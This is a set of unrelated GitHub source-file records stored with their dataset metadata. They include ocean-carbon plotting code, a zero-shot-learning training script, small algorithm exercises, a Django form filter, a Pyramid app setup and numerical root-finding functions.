hovmol=dco2.sel(time=cp_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n levs=dco2_range,\n\n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=17,\n hovmol=land.sel(time=cp_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n levs=co2_range,\n \n cmap='RdBu_r')\n\n\n#%% NINA\n\n\nplot_basemap_row(fig,axn=3,\n hovmol=sst.sel(time=nina_dates,method='nearest'),\n mean=sst.sel(time=all_dates,method='nearest'),\n units='Degrees C',\n title='SST',\n levs=sst_range,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=6,\n hovmol=ws_ccmp.wspd.sel(time=nina_dates,method='nearest'),\n mean=ws_ccmp.wspd.sel(time=all_dates,method='nearest'),\n units='m s$^{-1}$',\n title='Wind speed and direction',\n wu=wu.sel(time=nina_dates,method='nearest'),\n wv=wv.sel(time=nina_dates,method='nearest'),\n wv_all=wv.sel(time=all_dates,method='nearest'),\n wu_all=wu.sel(time=all_dates,method='nearest'),\n levs=ws_range,\n cmap='RdBu_r')\n\n\n# plot_basemap_row(fig,axn=9,\n# hovmol=divergence.sel(time=nina_dates,method='nearest'),\n# mean=divergence.sel(time=all_dates,method='nearest'),\n# units='m s$^{-1}$',\n# title='Wind divergence',\n# wu=wu.sel(time=nina_dates,method='nearest'),\n# wv=wv.sel(time=nina_dates,method='nearest'),\n# wv_all=wv.sel(time=all_dates,method='nearest'),\n# wu_all=wu.sel(time=all_dates,method='nearest'),\n# levs=np.arange(-6*10**-6,6.1*10**-6,0.5*10**-6),\n# cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=9,\n hovmol=chl.sel(time=nina_dates,method='nearest'),\n mean=chl.sel(time=all_dates,method='nearest'),\n units='mg chl m$^{-3}$',\n title='TPCA chlorophyll',\n levs=chl_range,\n cmap='RdBu_r')\n\n\nplot_basemap_row(fig,axn=12,\n hovmol=avg_npp.sel(lat=slice(-15,15)).sel(time=nina_dates,method='nearest'),\n mean=avg_npp.sel(lat=slice(-15,15)).sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='New production',\n levs=npp_range,\n\n cmap='RdBu_r')\n\n# plot_basemap_row(fig,axn=15,\n# hovmol=precip.sel(time=nina_dates,method='nearest'),\n# mean=precip.sel(time=all_dates,method='nearest'),\n# units='mm day$^{-1}$',\n# title='Precipitation',\n \n# levs=precip_range,\n\n# cmap='RdBu_r')\n\n\n#Delta pCO2\nh=plot_basemap_row(fig,axn=15,\n hovmol=dco2.sel(time=nina_dates,method='nearest'),#npp1.avg_npp,#dco2,#integratedpCO2,#monthlyPCO2*1000,\n mean=dco2.sel(time=all_dates,method='nearest'),\n units='μatm',\n title='\\u0394pCO$_{2}$',#'pCO21',\n levs=dco2_range,\n \n cmap='RdBu_r')\n\nplot_basemap_row(fig,axn=18,\n hovmol=land.sel(time=nina_dates,method='nearest'),\n mean=land.sel(time=all_dates,method='nearest'),\n units='mmol C m$^{-2}$ day$^{-1}$',\n title='Air-sea CO$_{2}$ flux',\n levs=co2_range,\n\n cmap='RdBu_r')\n\n\n\n\n\nplt.tight_layout()\nplt.savefig('figs/Figure4.png',dpi=300)\nplt.savefig('figs/vector/Figure4.eps')\nplt.savefig('figs/vector/Figure4.pdf')\nplt.show()\n\ntry:\n plt.savefig('figs/Figure4.jpeg',dpi=300)\nexcept:\n pass\nplt.show()\n\n\n# Check correlation between new prod and sst\n# %%\nev=[ep_dates,cp_dates,nina_dates,info.index,neutral]\nfor e in ev:\n sst_corr=sst.sel(time=e,method='nearest').sel(time=slice(np.datetime64('1997-09-01'),np.datetime64('2020-01-01')))#.mean(dim='time')-sst.sel(time=all_dates,method='nearest').mean(dim='time')\n avg_npp_corr=avg_npp.sel(time=e,method='nearest').sel(lat=slice(-15,15))#.mean(dim='time')-avg_npp.sel(time=all_dates,method='nearest').mean(dim='time')).sel(lat=slice(-15,15))\n\n startday=np.datetime64('2000-01-01')\n endday=np.datetime64('2020-01-01') \n \n sst_corr=sst_corr.sel(time=slice(startday,endday))\n avg_npp_corr=avg_npp_corr.sel(time=slice(startday,endday))\n \n c=xr.corr(sst_corr,avg_npp_corr,dim='time').mean().values\n print(c)","repo_name":"nicpittman/tropical_pacific_carbon_export","sub_path":"9d_ENSO_anomaly_spatial_maps.py","file_name":"9d_ENSO_anomaly_spatial_maps.py","file_ext":"py","file_size_in_byte":24644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28485159280","text":"def getShowBasedOnChannel(channel, showTitles):\n \"\"\"Checks which show is available for the user's channel.\n\n Args:\n channel (string): The channel the user has access to.\n showTitles (dict): A dictionary of available show to channel pairs. \n\n Returns:\n String: Returns the show available for the user's \n channel; returns None if no show is available. \n \"\"\"\n res = None\n for key in showTitles:\n if showTitles[key] == channel:\n return key\n return res\n\ndef genericUnitTest(test_func, desired_input_1, desired_input_2, desired_output):\n \"\"\"A generic unit test to test a function, in this case one that \n takes two args, like getShowBasedOnChannel. It asserts True if \n the expected output of the function matches the actual, and False\n otherwise. It also records any exception encountered.\n\n Args:\n test_func (function): the two-argument function to be tested\n desired_input_1 (_type_): in this case, the user channel availability\n desired_input_2 (_type_): in this case, the show title of the show the user intends to watch\n desired_output (_type_): the expected return value of test_func\n \"\"\"\n \n print(\"Testing \" + test_func.__name__)\n print(\"Input:\")\n print(\"\\t (Param 1): \" + str(desired_input_1) + \", \\n\\t (Param 2): \", desired_input_2)\n print(\"Expected output:\", desired_output)\n print(\"Actual output: \", (test_func(desired_input_1, desired_input_2),))\n try:\n assert desired_output == (test_func(desired_input_1, desired_input_2),)\n except Exception as name:\n print(\"\\nUNIT TEST RESULTS:\")\n print(\"TEST FAILED. The following exception has occurred: \" + type(name).__name__)\n\n\n#TEST CASES\nshowsAndChannel1 = (\"WeirdTV\", {\"Money Heist\": \"SpanishTV\", \"Stranger Things\": \"ScaryTV\"})\ntup = (None,)\ngenericUnitTest(getShowBasedOnChannel, *showsAndChannel1, tup)\n\nprint(\"\\n\")\n\nshowsAndChannel2 = (\"ScaryTV\", {\"Money Heist\": \"SpanishTV\", \"Stranger Things\": \"ScaryTV\"})\ntup = (\"Stranger Things\",)\ngenericUnitTest(getShowBasedOnChannel, *showsAndChannel2, tup)\n","repo_name":"Romani20/weekly-6-my-repo","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73111444963","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12927\n\nimport heapq\n\n\ndef solution(n, works):\n answer = 0\n heap = []\n for work in works:\n heapq.heappush(heap, -work)\n\n for i in range(n):\n heapq.heappush(heap, heapq.heappop(heap) + 1)\n\n for h in heap:\n if h < 0:\n answer += h**2\n\n return answer\n","repo_name":"unh6uoj/coding_test","sub_path":"Programmers/level3/야근 지수.py","file_name":"야근 지수.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37671807865","text":"# Zinc 2018\r\n# TheaterTickets: Given an array A, count the number of different triplets (a, b, c) in which a occurs before b and b occurs before c.\r\n\r\ndef theaterTickets(A):\r\n combinations = {}\r\n combinationsOfOne = 0\r\n combinationsOfTwo = 0\r\n combinationsOfThree = 0\r\n length = len(A)\r\n for i in range(length):\r\n currentCombinationsOfTwo = combinationsOfOne\r\n if A[i] not in combinations:\r\n combinations[A[i]] = [0,0]\r\n combinationsOfOne += 1\r\n currentCombinationsOfThree = combinationsOfTwo\r\n combinationsOfTwo += currentCombinationsOfTwo - combinations[A[i]][0]\r\n combinations[A[i]][0] = currentCombinationsOfTwo\r\n combinationsOfThree += currentCombinationsOfThree - combinations[A[i]][1]\r\n combinations[A[i]][1] = currentCombinationsOfThree\r\n combinationsOfThree %= 1000000007\r\n return combinationsOfThree\r\n pass\r\n\r\n# [1, 2, 1, 1] = 3\r\nprint(\"[1, 2, 1, 1], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([1, 2, 1, 1])))\r\n# [1, 2, 3, 4] = 4\r\nprint(\"[1, 2, 3, 4], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([1, 2, 3, 4])))\r\n# [2, 2, 2, 2] = 1\r\nprint(\"[2, 2, 2, 2], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([2, 2, 2, 2])))\r\n# [2, 2, 1, 2, 2] = 4\r\nprint(\"[2, 2, 1, 2, 2], the number of different triplets (a,b,c) in which a occurs before b and b occurs before c is\", str(theaterTickets([2, 2, 1, 2, 2])))\r\n","repo_name":"va64doman/codility","sub_path":"Challenges/zinc2018.py","file_name":"zinc2018.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35978183745","text":"\"\"\"\nPart of code is from Kai Li \"kailigo\". The gitub website is https://github.com/kailigo/cvcZSL.\nWe add virtual classes and IAS in the code.\n\"\"\"\nfrom scipy import io\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.optim import lr_scheduler\nimport torch.utils.data as data\nfrom sklearn.metrics import accuracy_score\nfrom tensorboardX import SummaryWriter\n\nfrom utils import ReDirectSTD\nfrom unseen_data_loader import data_loader_virtualCls\nfrom unseen_option import Options\n\nimport os\nimport random\nimport pickle\n# from test_embeded import test_while_training_simple\n\nTMP = 10\n\nargs = Options().parse()\nmodel_file_name = './chk/' + args.model_file\nsummaryFolder = './summary/' + args.log_file\nif not os.path.exists(summaryFolder):\n os.mkdir(summaryFolder)\nwriter = SummaryWriter(summaryFolder)\nprint(args)\n\ndef init_seeds(seed=0):\n random.seed(seed)\n np.random.seed(seed)\n\n # torch cuda\n torch.cuda.empty_cache()\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\ninit_seeds(520)\ndef calc_accuracy(test_visual, test_label, attM, test_id, test_id_seen_unseen,cossim=False): \n outpred = [0] * test_visual.shape[0] \n end = 0\n outpred_list = []\n zslpred_list = []\n score_n_list = []\n for j in range(0,len(test_visual),64):\n if j+64>len(test_visual):\n end = len(test_visual)\n else:\n end = j+64\n all_cls_weights = forward(attM,test_visual[j:end],tmp=TMP) \n score,score_n=apply_classification_weights(test_visual[j:end].cuda(), \n all_cls_weights,norm=True)\n score = score.squeeze(0)\n score_n = score_n.squeeze(0)\n \n _, pred = score.max(dim=1)\n pred = pred.view(-1)\n select_test_label = test_label[j:end].view(-1)\n\n outpred_list.extend(test_id[pred.cpu().detach().numpy()])\n zslpred_list.extend([ i in test_id_seen_unseen for i in test_id[pred.cpu().detach().numpy()]])\n score_n_list.extend(score_n.cpu().detach().numpy())\n\n seen_unseen_acc = accuracy_score(np.ones(len(zslpred_list)),zslpred_list)\n \n outpred = np.array(outpred_list, dtype='int')\n score_n = np.array(score_n_list)\n test_label = test_label.numpy()\n unique_labels = np.unique(test_label)\n acc = 0\n acc_cls = {}\n preds_cls = {}\n cos_cls = {}\n for l in unique_labels:\n idx = np.nonzero(test_label == l)[0]\n acc_cls[l] = accuracy_score(test_label[idx],outpred[idx])\n try:\n preds_cls[l].extend(list(outpred[idx])) \n except(KeyError):\n preds_cls[l] = list(outpred[idx])\n\n acc += acc_cls[l]\n loc = test_label == l\n outpred_l = outpred[idx]\n score_n_l = score_n[idx]\n loc = outpred_l == l\n\n if cossim:\n cos_c = score_n_l[loc,l]\n try:\n cos_cls[l].extend(cos_c)\n except(KeyError):\n cos_cls[l] = [cos_c]\n acc = acc / unique_labels.shape[0]\n\n return acc,seen_unseen_acc,acc_cls,cos_cls,preds_cls\n\n\ndef compute_accuracy_all(test_att, att_all, test_visual_unseen, test_id_unseen, test_label_unseen,\n test_visual_seen, test_id_all, test_label_seen,train_id):\n\n acc_zsl,_,unseenacc_cls,_,unseenpred_cls = calc_accuracy(test_visual_unseen, test_label_unseen, test_att, test_id_unseen,test_id_unseen)\n acc_seenAcc,_,seenacc_cls,_,_ = calc_accuracy(test_visual_seen, test_label_seen, att_all, train_id, train_id)\n\n att_all_cls = torch.cat((att_all, test_att))\n \n acc_gzsl_unseen,Ru,unseengeneralAcc_cls,unseenCos_cls,_ = calc_accuracy(test_visual_unseen, test_label_unseen, att_all_cls, test_id_all,test_id_unseen,cossim=True)\n \n acc_gzsl_seen,Rs,seengeneralAcc_cls,seenCos_cls,_ = calc_accuracy(test_visual_seen, test_label_seen, att_all_cls, test_id_all,train_id,cossim=True) \n acc_cls = {**unseenacc_cls,**seenacc_cls}\n generalAcc_cls = {**unseengeneralAcc_cls,**seengeneralAcc_cls}\n H = 2 * acc_gzsl_seen * acc_gzsl_unseen / (acc_gzsl_seen + acc_gzsl_unseen)\n\n return acc_zsl, acc_seenAcc, acc_gzsl_unseen, acc_gzsl_seen, H, Rs, Ru, acc_cls, generalAcc_cls,unseenCos_cls,seenCos_cls,unseenpred_cls\n\n\ndef apply_classification_weights(features, cls_weights,norm=False):\n\n features = F.normalize(features,dim=-1)\n cls_weights = F.normalize(cls_weights, p=2, dim=-1, eps=1e-12) \n\n cls_scores = scale_cls * (torch.matmul(cls_weights,features.t()))\n cls_scores = cls_scores.permute(0,2,1)\n cls_scores = torch.diagonal(cls_scores,offset=0,dim1=0,dim2=1)\n cls_scores = cls_scores.t()\n if norm:\n return cls_scores,cls_scores/scale_cls\n else:\n return cls_scores\n\n\ndef IASatt(features,AttM,tmp):\n cls_num = len(AttM)\n attdims = AttM.shape[1]\n atten = torch.mm(features,w_IAS)+b_IAS\n atten = F.softmax(atten/tmp,dim=1).reshape(-1,1,attdims)\n atten = atten.reshape(-1,1,attdims)\n atten = atten + torch.ones_like(atten)\n atten = atten.repeat(1,cls_num,1)\n AttM = AttM.unsqueeze(0)\n AttM = AttM.repeat(len(features),1,1)\n AttM = atten*AttM\n return AttM\n\ndef forward(att,features,tmp):\n features = features.squeeze()\n att = IASatt(features,att,tmp)\n\n a1 = F.relu(torch.matmul(att, w1) + b1)\n a2 = F.relu(torch.matmul(a1, w2) + b2)\n\n return a2\n\ndataroot = './dataset/xlsa/'\nimage_embedding = 'res101' \nclass_embedding = 'att'\ndataset = args.dataset\nmatcontent = io.loadmat(dataroot + \"/\" + dataset + \"/\" + image_embedding + \".mat\")\n\nfeature = matcontent['features'].T\nlabel = matcontent['labels'].astype(int).squeeze() - 1\nmatcontent = io.loadmat(dataroot + \"/\" + dataset + \"/\" + class_embedding + \"_splits.mat\")\n\ntrainvalloc = matcontent['trainval_loc'].squeeze() - 1\ntest_seen_loc = matcontent['test_seen_loc'].squeeze() - 1\ntest_unseen_loc = matcontent['test_unseen_loc'].squeeze() - 1\n\natt_name = 'att'\nattribute = matcontent[att_name].T \n\nchkFile = './dataset/finetune/'+args.dataset+'/dvbeExtracted.pkl'\nwith open(chkFile,'rb') as f:\n Feature_target = pickle.load(f)\n\nclsname = [ matcontent['allclasses_names'][i][0][0] for i in range(len(matcontent['allclasses_names']))]\n\ntrain_x = Feature_target['train_seen']['features']\ntrain_label = Feature_target['train_seen']['labels']\ntrain_att = attribute[train_label]\ntrain_id, idx = np.unique(train_label, return_inverse=True)\ntrain_att_unique = attribute[train_id]\n\ntest_x_unseen = Feature_target['test_unseen']['features']\ntest_label_unseen = Feature_target['test_unseen']['labels']\ntest_id, idx = np.unique(test_label_unseen, return_inverse=True)\natt_pro = attribute[test_id]\ntrain_test_id = np.concatenate((train_id, test_id))\n\ntest_x_seen = Feature_target['test_seen']['features'] \ntest_label_seen = Feature_target['test_seen']['labels']\n_, idx = np.unique(test_label_seen, return_inverse=True)\n\natt_dim = train_att.shape[1]\nfeat_dim = train_x.shape[1]\n\natt_pro = torch.from_numpy(att_pro).float().cuda()\ntest_x_seen = torch.from_numpy(test_x_seen).float().cuda()\ntest_x_seen = F.normalize(test_x_seen, p=2, dim=test_x_seen.dim()-1, eps=1e-12)\ntest_x_unseen = torch.from_numpy(test_x_unseen).float().cuda()\ntest_x_unseen = F.normalize(test_x_unseen, p=2, dim=test_x_unseen.dim()-1, eps=1e-12)\ntest_label_seen = torch.tensor(test_label_seen)\ntest_label_unseen = torch.tensor(test_label_unseen)\n\natt_all = torch.from_numpy(train_att_unique).float().cuda()\n\nbias = nn.Parameter(torch.FloatTensor(1).fill_(0).cuda(), requires_grad=True)\nscale_cls = nn.Parameter(torch.FloatTensor(1).fill_(10).cuda(), requires_grad=True)\nw1 = Variable(torch.FloatTensor(att_dim, args.hidden_dim).cuda(), requires_grad=True)\nb1 = Variable(torch.FloatTensor(args.hidden_dim).cuda(), requires_grad=True)\nw2 = Variable(torch.FloatTensor(args.hidden_dim, 2048).cuda(), requires_grad=True)\nb2 = Variable(torch.FloatTensor(2048).cuda(), requires_grad=True)\nw_IAS = Variable(torch.FloatTensor(2048, att_dim).cuda(), requires_grad=True)\nb_IAS = Variable(torch.FloatTensor(att_dim).cuda(), requires_grad=True)\n\nw1.data.normal_(0, 0.02)\nw2.data.normal_(0, 0.02)\nb1.data.fill_(0)\nb2.data.fill_(0)\nw_IAS.data.normal_(0,0.02)\nb_IAS.data.fill_(0)\n\noptimizer = torch.optim.Adam([w_IAS,b_IAS,w1, b1, w2, b2, bias, scale_cls], lr=args.lr, weight_decay=args.opt_decay)\n\n# breakpoint()\nstep_size = args.step_size\ngamma = args.gamma\nlr_scheduler = lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)\ncriterion = nn.CrossEntropyLoss()\n\nways = args.ways\nshots = args.shots\n\ndataset = data_loader_virtualCls(train_x, train_att, train_label, ways=ways, shots=shots)\n\n# breakpoint()\nbest_acc_zsl = 0.0\nbest_acc_gzsl_seen = 0.0\nbest_acc_gzsl_unseen = 0.0\nbest_H = 0.0\nbest_epoch = 0\nbest_unseenAcc = 0.0\n\n\nfor epoch in range(args.num_epochs): \n epoch_loss = 0\n lr_scheduler.step()\n\n for i in range(1000): \n batch_visual, batch_att, batch_label = dataset.__getitem__(i) \n batch_visual = batch_visual.cuda() \n batch_visual_norm = F.normalize(batch_visual, p=2, dim=batch_visual.dim()-1, eps=1e-12) \n\n indx = torch.tensor(list(range(0, ways*shots, shots))) \n unique_batch_att = torch.index_select(batch_att, 0, indx).float().cuda() \n\n batch_weights = forward(unique_batch_att,batch_visual_norm,tmp=TMP) \n all_cls_weights = batch_weights\n\n score = apply_classification_weights(batch_visual_norm, all_cls_weights)\n score = score.squeeze(0) \n loss = criterion(score, Variable(batch_label.cuda()))\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_([w_IAS,b_IAS,w1, b1, w2, b2, scale_cls, bias], 1)\n optimizer.step()\n epoch_loss = epoch_loss + loss\n\n epoch_loss = epoch_loss / 1000.0\n epoch_loss = epoch_loss.data.cpu().numpy()\n\n acc_zsl, seenAcc, acc_unseen_gzsl, acc_seen_gzsl, H, Rs,Ru,accs_cls,generalAccs_cls,unseenCos_cls,seenCos_cls,unseenpred_cls = compute_accuracy_all(att_pro, att_all, test_x_unseen, \n test_id, test_label_unseen, test_x_seen, train_test_id, test_label_seen, train_id)\n \n H = 2 * acc_seen_gzsl * acc_unseen_gzsl / (acc_seen_gzsl + acc_unseen_gzsl)\n writer.add_scalar('general/acc_seen_gzsl',acc_seen_gzsl,epoch)\n writer.add_scalar('general/acc_unseen_gzsl',acc_unseen_gzsl,epoch)\n writer.add_scalar('general/H',H,epoch)\n writer.add_scalar('split/unseenAcc',acc_zsl,epoch)\n writer.add_scalar('split/seenAcc',seenAcc,epoch)\n writer.add_scalar('split/Rs',Rs,epoch)\n writer.add_scalar('split/Ru',Ru,epoch)\n writer.add_scalar('loss/loss',epoch_loss,epoch)\n \n\n if acc_zsl > best_unseenAcc:\n print('save best acc')\n best_unseenAcc = acc_zsl\n best_epoch = epoch\n best_acc_zsl = acc_zsl \n best_seen_acc = seenAcc \n best_acc_gzsl_seen = acc_seen_gzsl\n best_acc_gzsl_unseen = acc_unseen_gzsl\n best_H = H\n best_Ru = Ru\n best_Rs = Rs\n\n best_w1 = w1.data.clone()\n best_b1 = b1.data.clone()\n best_w2 = w2.data.clone()\n best_b2 = b2.data.clone()\n best_scale_cls = scale_cls.data.clone()\n best_bias = bias.data.clone()\n\n torch.save({'w1': best_w1, 'b1': best_b1, 'w2': best_w2, 'b2': best_b2, \n 'scale_cls': best_scale_cls, 'bias': best_bias,'w_IAS':w_IAS,'b_IAS':b_IAS}, model_file_name.replace('.pt','bestunseenAcc.pt'))\n \n\n for param_group in optimizer.param_groups:\n print('ep: %d, lr: %lf, loss: %.4f, zsl: %.4f, seenAcc: %.4f gzsl: seen=%.4f, unseen=%.4f, h=%.4f, Rs=%.4f, Ru=%.4f ' % \n (epoch, param_group['lr'], epoch_loss, acc_zsl, seenAcc, acc_seen_gzsl, acc_unseen_gzsl, H, Rs, Ru,)) \nprint(model_file_name)\nprint('best_ep: %d, zsl: %.4f, seenAcc: %.4f gzsl: seen=%.4f, unseen=%.4f, h=%.4f, Rs=%.4f, Ru=%.4f' % \n (best_epoch, best_acc_zsl,best_seen_acc, best_acc_gzsl_seen, best_acc_gzsl_unseen, best_H, best_Rs, best_Ru)) \n\n","repo_name":"anonmous529/AGZSL","sub_path":"train_unseen.py","file_name":"train_unseen.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"15347637747","text":"import csv\n\nwith open('elements.csv', 'rb') as csvfile:\n\telementReader = csv.reader(csvfile, delimiter=',')\n\theader = elementReader.next()\n\tsassString = \"$elements: (\\n\"\n\tfor row in elementReader:\n\t\tsassString += '\\t' + row[0].rstrip().lstrip()+' : (\\n'\n\t\tindex = 1\n\t\tfor datum in row[1:-1]:\n\t\t\tsassString += '\\t\\t' + header[index] + ' : \\'' + datum.lstrip().rstrip() + '\\',\\n'\n\t\t\tindex += 1\n\t\tif len(row[-1]) < 6:\n\t\t\trow[-1] = '00'+row[-1]\n\t\trow[-1] = row[-1].replace('+', '')\n\t\tsassString = sassString + '\\t\\t' + header[-1] + ' : #' + row[-1] + '\\n\\t),\\n'\n\tsassString = sassString[:-2] + '\\n);'\n\twith open('source/scss/_elements.scss', 'wb') as f:\n\t\tf.write(sassString)\n","repo_name":"ahadik/elemental","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37404938283","text":"from django.http import Http404\nfrom django.shortcuts import render, redirect\n\n#import enchant\nimport re\nfrom migrations.models import PhoneForm\n\n# D = enchant.Dict(\"en-US\")\n\n\ndef algorithm(a, b, c):\n s1, s = 0, 0\n a1 = list(PhoneForm.objects.values_list('email', flat=True))\n if len(a) > 7:\n if re.match(r'\\b[\\w\\.-]+@[\\w\\.-]+\\.\\w{2,4}\\b', a):\n s = s + 1\n else:\n s = s + 0\n\n for item in a1:\n if a == item:\n s1 = s1 + 1\n else:\n s1 = s1 + 0\n if s1 > 2:\n return False\n else:\n e = list(PhoneForm.objects.filter(email=item).values_list('subjects', flat=True))\n for itm in e:\n if b == itm:\n return False\n else:\n f = list(PhoneForm.objects.filter(email=item).values_list('messages', flat=True))\n for itm1 in f:\n if c == itm1:\n return False\n else:\n s = s + 1\n\n list1 = b.split(' ')\n l1 = len(list1)\n ln1 = 0\n for r in list1:\n if D.check(r) == True:\n ln1 = ln1 + 1\n else:\n ln1 = ln1 + 0\n if l1 == ln1:\n s = s + 1\n else:\n s = s + 0\n\n list2 = c.split(' ')\n l2 = len(list2)\n ln2 = 0\n for n in list2:\n if D.check(n) == True:\n ln2 = ln2 + 1\n else:\n ln2 = ln2 + 0\n if l2 == ln2:\n s = s + 1\n else:\n s = s + 0\n\n if s == 4:\n return True\n else:\n return False\n\n\ndef c_form(request):\n if request.method == 'GET':\n template = 'phone.html'\n x = PhoneForm.objects.all()\n data = {'phone_list': x}\n return render(request, template, data)\n\n elif request.method == 'POST':\n email = request.POST['email']\n subjects = request.POST['subjects']\n messages = request.POST['messages']\n if algorithm(email, subjects, messages):\n x = PhoneForm(email=email, subjects=subjects, messages=messages)\n x.save()\n return redirect('c_form')\n else:\n return redirect('c_form')\n\n\ndef c_form_delete(request, phone_id):\n try:\n x = PhoneForm.objects.get(id=phone_id)\n except PhoneForm.DoesNotExsist:\n return Http404\n else:\n x.delete()\n return redirect('c_form')\n","repo_name":"SRI-VISHVA/scam","sub_path":"scam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13714172845","text":"def newton(f, df, x0, max_it=20, tol=1e-3):\n iter = 0\n\n # Check if the initial guess is very close to a root\n if abs(f(x0)) < tol:\n return x0, True, iter\n\n # Continue iterating until the maximum number of iterations is reached\n while iter < max_it:\n f0 = f(x0)\n dfdx0 = df(x0)\n\n if abs(f0) < tol:\n # Convergence achieved\n return x0, True, iter\n\n if abs(dfdx0) < tol:\n # Newton's method fails to converge due to zero derivative\n raise RuntimeError(\"Newton's method failed to converge.\")\n\n x1 = x0 - f0 / dfdx0 # Compute the next guess for the root\n if abs(x1 - x0) < tol:\n # Convergence achieved\n return x1, True, iter\n\n x0 = x1 # Update the current guess\n iter += 1 # Increment the iteration counter\n\n return x0, False, iter\n\n\ndef bisection(f, a, b, max_iter=1000, tol=1e-3):\n # Check if the function has no roots or more than one root in the given interval\n if f(a) * f(b) > 0:\n print(f'No roots or more than one root in [{a}, {b}]')\n return None\n\n # Initialize the midpoint of the interval\n m = (a + b) / 2\n\n # Perform the bisection method until the desired tolerance or maximum number of iterations is reached\n iterations = 0\n while abs(f(m)) > tol:\n # Break the loop if the method does not converge within max_iter iterations\n if iterations >= max_iter:\n print(f\"The method did not converge after {max_iter} iterations.\")\n return None\n\n # Check which half of the interval to update based on the sign of f(a)*f(m)\n if f(a) * f(m) < 0: # If 'a' and 'm' bracket a root, update 'b' to 'm'\n b = m\n elif f(b) * f(m) < 0: # If 'b' and 'm' bracket a root, update 'a' to 'm'\n a = m\n\n # Compute the new midpoint\n m = (a + b) / 2\n iterations += 1\n\n # Return the approximate root\n return m","repo_name":"pineapple-bois/polynomial-methods","sub_path":"py_files/root_finding.py","file_name":"root_finding.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19052910999","text":"from pyramid.config import Configurator\n\n\ndef main(global_config, **settings):\n config = Configurator(settings=settings)\n\n # Jinja2\n config.include('pyramid_jinja2')\n config.add_jinja2_search_path('templates/')\n\n # Static files\n config.add_static_view(name='cache', path='cache')\n config.add_static_view(name='node_modules', path='../node_modules')\n\n # Routes\n config.add_route('home', '/')\n\n # Views\n config.scan()\n\n return config.make_wsgi_app()\n","repo_name":"netbek/piper","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1809125986","text":"import re\nwords = sorted(input().split(), key=len)\nword = words[0]\nlength = len(word)\n\nfor i in range(length, 0, -1):\n substrings = set(word[j:j + i] for j in range(0, 1 + length - i))\n ok = sorted(list(filter(lambda ss: all(map(lambda w: ss in w, words[1:])), substrings)))\n if ok: break\n\nprint(ok[0])\n","repo_name":"rabestro/sololearn-challenges","sub_path":"medium/pro-longest-common-substring/LongestCommonSubstring.py","file_name":"LongestCommonSubstring.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"73519625762","text":"\"\"\"classe pour importer des fichiers CSV\nstructurés :\n\"Apolinne\"\n\"Linh-Da\"\n\"Mathieu\"\n\"Mathis\"\n\"Oussama\"\n\"\"\"\n\nimport csv\nfrom importation_objects.abstract_importation_liste import AbstractImportationListe\n\nclass ImportationCsv(AbstractImportationListe):\n \"\"\"permet d'importer des Csv (au format simpliste: pas\n de titre, mots mis ligne à ligne entre '\"')\n\n Parameters\n ----------\n Example\n -------\n \"\"\"\n #pylint: disable=too-few-public-methods\n #pylint: disable=super-init-not-called\n def __init__(self):\n \"\"\"_summary_\n\n Parameters\n ----------\n fichier : str\n nom du fichier avec l'extension .csv\n dossier : str\n chemin du dossier\n encodage : str, optional\n encodage du fichier, by default ' utf-8'\n\n Example\n -------\n >>> import json\n >>> from importation_objects.abstract_importation_liste import AbstractImportationListe\n >>> ma_liste = ImportationCsv()\n >>> isinstance(ma_liste, ImportationCsv)\n True\n \"\"\"\n\n #pylint: disable=arguments-differ\n def creer(self, fichier : str, dossier : str,\n encodage: str = ' utf-8', separateur : str = ','):\n \"\"\"retourne une liste de mos à partir d'un fichier CSV\n\n Parameters\n ----------\n fichier : str\n nom du fichier\n dossier : str\n nom du dossier\n encodage : str, optional\n encodage, by default ' utf-8'\n separateur : str, optional\n séparateur, by default ','\n\n Returns\n -------\n liste_mots : list[str]\n\n Examples\n --------\n >>> import csv\n >>> from importation_objects.abstract_importation_liste import AbstractImportationListe\n >>> ma_liste = 